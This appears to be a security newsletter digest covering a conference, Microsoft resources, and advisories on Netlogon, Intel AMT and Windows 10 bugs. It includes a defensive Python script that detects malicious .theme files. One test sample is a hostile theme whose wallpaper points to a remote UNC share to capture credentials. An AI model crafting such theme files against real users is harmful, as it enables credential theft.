New York Metro Joint Cyber-Security Conference

I will be teaching at the New York Metro Joint Cyber-Security Conference (NYMJCSC.ORG).

This conference offers 2 days of security content, presented by the following groups:

Organizational Partners:

  • InfraGard Members Alliance – New York Metro Chapter
  • Information Systems Audit and Control Association (ISACA) – New Jersey Chapter
  • Information Systems Audit and Control Association (ISACA) – Greater Hartford CT Chapter
  • High Technology Crime Investigation Association (HTCIA) – New York City Metro Chapter
  • Internet Society (ISOC) – New York Chapter
  • Information Systems Security Association (ISSA) – New York Chapter

Community Partners:

  • (ISC)2 – New Jersey Chapter
  • Information Systems Audit and Control Association (ISACA) – New York Metro Chapter
  • Cloud Security Alliance (CSA) – New York Metro Chapter
  • Association of Certified Fraud Examiners (ACFE) – New Jersey Chapter
  • Association of Continuity Professionals (ACP) – New York City Metro Chapter

Please look at this link; I believe you will find some great content at a very reasonable price.

The link is NYMJCSC.ORG

Latest Microsoft Security blog posts

Title: Find your unscanned and overexposed shares on-premises with an on-premises scanner

URL: https://techcommunity.microsoft.com/t5/microsoft-security-and/find-your-unscanned-and-overexposed-shares-on-premises-with-an/ba-p/1744783
Overview: Microsoft Information Protection is a built-in, intelligent, unified,
and extensible solution to protect sensitive data across your enterprise – in
Microsoft 365 cloud services, on-premises, third-party SaaS applications, and
more. Microsoft Information Protection provides a unified set of capabilities
to know your data, protect your data, and prevent data loss across cloud services,
devices, and on-premises file shares.

 

Title: Microsoft Information Protection and Compliance Resources
URL: https://techcommunity.microsoft.com/t5/microsoft-security-and/microsoft-information-protection-and-compliance-resources/ba-p/1184950
Overview: The Microsoft Information Protection and Compliance Customer
Experience (CXE) team works with Microsoft’s largest enterprise customers to
provide guidance and advisory services to help them deploy our information
protection and compliance solutions.

 

Title: Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security
URL: https://www.microsoft.com/security/blog/2020/10/05/why-integrated-phishing-attack-training-is-reshaping-cybersecurity-microsoft-security/
Overview: Phishing is still one of the most significant risk vectors facing
enterprises today. Innovative email security technology like Microsoft Defender
for Office 365 stops a majority of phishing attacks before they hit user
inboxes, but no technology in the world can prevent 100 percent of phishing
attacks from hitting user inboxes. At that point in…

 

Title: Azure Sentinel To-Go (Part2): Integrating a Basic Windows Lab 🧪 via ARM Templates 🚀
URL: https://techcommunity.microsoft.com/t5/azure-sentinel/azure-sentinel-to-go-part2-integrating-a-basic-windows-lab-via/ba-p/1742165
Overview: Most of the time when we think about the basics of a detection
research lab, it is an environment with Windows endpoints, audit policies
configured, a log shipper, a server to centralize security event logs and an
interface to query, correlate and visualize the data collected.

 

Title: 3 ways Microsoft helps build cyber safety awareness for all
URL: https://www.microsoft.com/security/blog/2020/10/05/3-ways-microsoft-helps-build-cyber-safety-awareness-for-all/
Overview: Learn how Microsoft is helping secure your online life through user
education, cybersecurity workshops, and continued diversity in hiring.

 

Title: Migrating from Exchange Transport Rules to Unified DLP – The complete playbook

URL: https://techcommunity.microsoft.com/t5/microsoft-security-and/migrating-from-exchange-transport-rules-to-unified-dlp-the/ba-p/1749723
Overview: This document provides an overview of how enterprise customers can
migrate their existing Exchange Transport Rules to Unified DLP portal. It walks
through the different stages of migration and shows the effectiveness of the
unified DLP portal as a single place to define all aspects of your DLP
strategy.
In summary, this playbook will help you to:

  • Understand the migration process.
  • Understand the unified console and interface.
  • Develop a strategy for the migration.
  • Ensure a smooth migration process.
  • Find resources to support the migration process.

 

Python for Beginners: a free resource from Microsoft

Probably the largest hurdle when learning any new programming language is simply knowing where to get started. This is why we, Chris and Susan, decided to create this series about Python for Beginners!


Even though we won’t cover everything there is to know about Python in the course, we want to make sure we give you the foundation on programming in Python, starting from common everyday code and scenarios. At the end of the course, you’ll be able to go and learn on your own, for example with docs, tutorials, or books.

This is all on youtube.com
Go to this LINK

Beginner’s Series to: JavaScript, a free resource from Microsoft

Learning a new framework or development environment is made even more difficult when you don’t know the programming language. Fortunately, we’re here to help! We’ve created this series of videos to focus on the core concepts of JavaScript.


While we don’t cover every aspect of JavaScript, we will help you build a foundation from which you can continue to grow. By the end of this series, you’ll be able to work through tutorials, quick starts, books, and other resources, continuing to grow on your own.

The video series is designed to be consumed as you see fit. You can watch from start to finish, or you can dive into specific topics. You can always bookmark and come back as you need.

This is a YouTube series of 51 different videos to help you learn JavaScript.

Go to this link

CVE-2020-1472 | Netlogon Elevation of Privilege Vulnerability

An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network.

To exploit the vulnerability, an unauthenticated attacker would be
required to use MS-NRPC to connect to a domain controller to obtain
domain administrator access.

Microsoft is addressing the vulnerability in a phased two-part
rollout. These updates address the vulnerability by modifying how
Netlogon handles the usage of Netlogon secure channels.

For guidelines on how to manage the changes required for this vulnerability and more information on the phased rollout, see How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 (updated September 28, 2020).

When the second phase of Windows updates becomes available in Q1 2021, customers will be notified via a revision to this security vulnerability. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See Microsoft Technical Security Notifications.

Blockchain Networks: Token Design and Management Overview – Draft NISTIR 8301 Available for Comment

Traditional data and operations management across organizations and on the web can involve inefficient transaction reconciliation between siloed databases, password fatigue, and single points of failure. This often results in concerns over interoperability, security, and privacy of data that affect both users and businesses.

Blockchain technology has enabled a new software paradigm for managing digital ownership in partial or zero-trust environments. It uses tokens to conduct transactions, exchange verifiable data, and achieve coordination across organizations and on the web. Data models with varied capabilities and scopes have been defined to issue tokens. By allowing for the design of programmable digital assets that can represent different forms of ownership, these models enable users to store, move, and even create value on top of shared or public digital infrastructures.

NIST announces the release of Draft NISTIR 8301, Blockchain Networks: Token Design and Management Overview, which provides a high-level technical overview and conceptual framework of token designs and management methods. The document highlights the different types of tokens and how they are held in custody. It then examines transaction management under three fundamental aspects: validation, submission, and viewability. Infrastructure tools used to develop applications that integrate blockchain networks and second layer protocols are also reviewed. Finally, the paper presents deployment scenarios and use cases for tokens before concluding with potential breakthroughs in privacy-preserving verifiable data exchange. The terminology, concepts, properties, and architectures introduced in this work can facilitate understanding and communications among business owners, software developers, cybersecurity professionals within an organization, and individuals who are or will be using such systems.

A public comment period for this document is open through October 30, 2020. See the publication details for a copy of the document and instructions for submitting comments.

NOTE: A call for patent claims is included on page iv of this draft. For additional information, see the Information Technology Laboratory (ITL) Patent Policy–Inclusion of Patents in ITL Publications.

ITL
Patent Policy:
https://www.nist.gov/itl/information-technology-laboratory-itl-patent-policy-inclusion-patents-itl-publications

CISA and MS-ISAC Release Ransomware Guide

 

The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) have released a joint Ransomware Guide that details practices that organizations should continuously engage in to help manage the risk posed by ransomware and other cyber threats. The in-depth guide provides actionable best practices for ransomware prevention as well as a ransomware response checklist that can serve as a ransomware-specific addendum to organization cyber incident response plans.

CISA encourages users and administrators to review the Ransomware Guide and CISA’s Ransomware webpage for additional information.

Securing Home IoT Devices Using MUD: Final Public Draft of SP 1800-15 Now Available

 

NIST Cybersecurity and Privacy Program

NIST’s National Cybersecurity Center of Excellence (NCCoE) has released the final public draft of the NIST Cybersecurity Practice Guide, SP 1800-15, Securing Small-Business and Home Internet of Things (IoT) Devices: Mitigating Network-Based Attacks Using Manufacturer Usage Description (MUD), and is seeking the public’s comments on the contents. This practice guide is intended to show IoT device developers and manufacturers, network equipment developers and manufacturers, and service providers who employ MUD-capable components how to integrate and use MUD and other tools to satisfy IoT users’ security requirements.

The public comment period is open through October 16, 2020. See the publication details for a copy of the draft and instructions for submitting comments.

NOTE: A call for patent claims is included on page iii of 1800-15B. For additional information, see the Information Technology Laboratory (ITL) Patent Policy–Inclusion of Patents in ITL Publications.

Publication details:
https://csrc.nist.gov/publications/detail/sp/1800-15/draft

ITL Patent Policy:
https://www.nist.gov/itl/information-technology-laboratory-itl-patent-policy-inclusion-patents-itl-publications


NIST Cybersecurity and Privacy Program
NIST Applied Cybersecurity Division (ACD)
National Cybersecurity Center of Excellence (NCCoE)
Questions/Comments regarding Draft SP 1800-15 – send email to
[email protected]
CSRC Website Questions? Send email to: [email protected] 

Intel vPro Gets vPwned

 Modern processors are extremely complicated devices and aren’t single purpose number crunching machines as they were in the past. A modern CPU contains subsystems responsible for power management, remote administration, hardware security, and much more. Intel brands this collection of technologies as vPro. The subsystem with perhaps the most attack surface is branded as Intel Active Management Technology (AMT), a system designed to allow for remote administration of corporate computer assets. It provides out of band administration, meaning an authorized administrator can perform any number of tasks on the machine without requiring specific operating system features like a functioning Windows install or separate software running on the system. This week researchers discovered a critical flaw in the AMT system allowing for an unauthorized user to completely takeover affected machines.

Intel AMT runs on a dedicated microprocessor embedded in the normal CPU and as such isn’t something a normal user ever has to deal with. It is able to piggyback on the normal networking stack exposed to the operating system to allow for out of band management of the machine without any user interaction. Due to it being embedded in the processor it has almost complete and unrestricted access to the system. This makes finding flaws in it extremely valuable to researchers and hackers. Luckily the flaw found this week was discovered by internal Intel researchers whose goal it is to discover critical vulnerabilities before attackers do. CVE-2020-8758 was disclosed in a security advisory and ranks a 9.8/10 on the CVSS scale. The flaw is the result of improper buffer restrictions in the network component of the AMT subsystem and could allow for privilege escalation and complete takeover of a system running the vulnerable version. The critical flaw requires that AMT has been previously provisioned by a system administrator and that an attacker can reach the system over the network.

While the main vulnerability disclosed requires AMT to be provisioned, a second attack scenario was also disclosed which is able to attack an un-provisioned AMT instance. In this scenario an attacker would require local access to the machine to exploit the flaw. While not nearly as critical as a remote, over-the-network exploit, it can pose a threat to systems exposed to public access, such as shared computing resources, or cases where a machine may be left unattended for a period of time.

While no known attacks utilizing the flaw have been seen yet, Intel recommends that systems running the affected firmware versions are patched immediately.

Sources:

· https://threatpost.com/critical-intel-active-management-technology-flaw-allows-privilege-escalation/159036/

· https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00404.html

 

Don’t Leave Your Windows Open (to Attack)

 No matter what operating system you use, there will be vulnerabilities lurking in the nooks and crannies we may never consider. If you’re using Windows 10, here are two you should know about.

The first bug affects all Windows 10 editions except for Home, as it leverages Hyper-V, a feature that provides hardware virtualization. In order to create and modify files in certain areas of Windows a user needs elevated privileges. This is to protect sensitive areas of the operating system. Enabling Hyper-V circumvents the need for admin credentials, as researcher Jonas Lykkegaard showed how he was able to drop an arbitrary file into the System32 folder and then modify it with user-level credentials.

Luckily, Hyper-V is disabled by default, so if you don’t use any sort of virtualization you won’t be vulnerable. However, if you enable the Windows Sandbox feature, which is often used for testing software, Hyper-V will automatically be enabled as well. The risk of this bug is low enough that the researcher decided not to submit it directly to Microsoft, so it is unclear if or when a patch will be released. The best advice here would be to keep your system up to date and to disable features that you aren’t using.

The next bug involves a feature on Windows 10 that most users have used – Themes. Whether it’s selecting a pre-packaged theme to get away from that default blue, or using our own wallpapers to customize, nearly everyone makes some sort of change to the appearance of their desktop. Some users go a step further and export their custom themes to share or import custom themes that others have built. This is where the vulnerability comes in. Researcher Jimmy Bayne recently showed that modified Windows 10 themes could be used in Pass-the-Hash attacks.

Bayne demonstrated how an attacker could create a theme file with a modified wallpaper setting that would request a remote resource requiring authentication. If a user tries to install the theme, Windows will automatically attempt to access the remote resource using the credentials of the user currently logged into Windows. From there an attacker can harvest the credentials. Even worse, this attack works with Microsoft account credentials, meaning attackers would be able to access users’ online resources as well. The easiest way to mitigate the threat is to enable two-factor authentication and avoid custom themes from third parties.
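As an added example (not from the article or from Bayne's research), here is a small Python check a defender could run over collected .theme files before letting users import them: it parses the file, which is plain INI, and flags any wallpaper path that would make Windows authenticate to another host. The section and key names are assumed from the standard .theme layout, and both sample theme files are constructed for this example.

```python
import configparser
from urllib.parse import urlparse

# Sections and keys in a Windows .theme file that can hold an image path.
# Assumed from the standard .theme layout; extend if your files use others.
IMAGE_KEYS = {
    "Control Panel\\Desktop": ("Wallpaper",),
    "Slideshow": ("ImagesRootPath",),
}

def is_remote(path: str) -> bool:
    """True if resolving this path would contact another host."""
    p = path.strip().strip('"')
    if p.startswith("\\\\") or p.startswith("//"):
        return True  # UNC share: Windows authenticates over SMB with the user's credentials
    # Drive letters ("C:\...") parse as a one-letter scheme, so they fall through here.
    return urlparse(p).scheme.lower() in {"http", "https", "ftp", "smb", "webdav"}

def find_remote_references(theme_text: str) -> list:
    """Return (section, key, value) for every image path that points off-host."""
    # interpolation=None: real themes contain %SystemRoot%, which would
    # otherwise trip configparser's '%' interpolation.
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True, strict=False)
    cp.read_string(theme_text)
    findings = []
    for section, keys in IMAGE_KEYS.items():
        if not cp.has_section(section):
            continue
        for key in keys:
            value = cp.get(section, key, fallback=None)
            if value and is_remote(value):
                findings.append((section, key, value))
    return findings

# Constructed sample: a normal theme pointing at a local stock wallpaper.
BENIGN_THEME = r"""[Theme]
DisplayName=Corporate Blue

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0
"""

# Constructed sample: wallpaper on a UNC share (203.0.113.10 is a documentation address).
SUSPECT_THEME = r"""[Theme]
DisplayName=Free Dark Theme

[Control Panel\Desktop]
Wallpaper=\\203.0.113.10\share\wallpaper.jpg
TileWallpaper=0
"""

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_THEME), ("suspect", SUSPECT_THEME)):
        print(name, find_remote_references(text) or "no remote references")
```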

Sources:

· https://www.bleepingcomputer.com/news/security/windows-10-sandbox-activation-enables-zero-day-vulnerability/

· https://www.bleepingcomputer.com/news/microsoft/windows-10-themes-can-be-abused-to-steal-windows-passwords/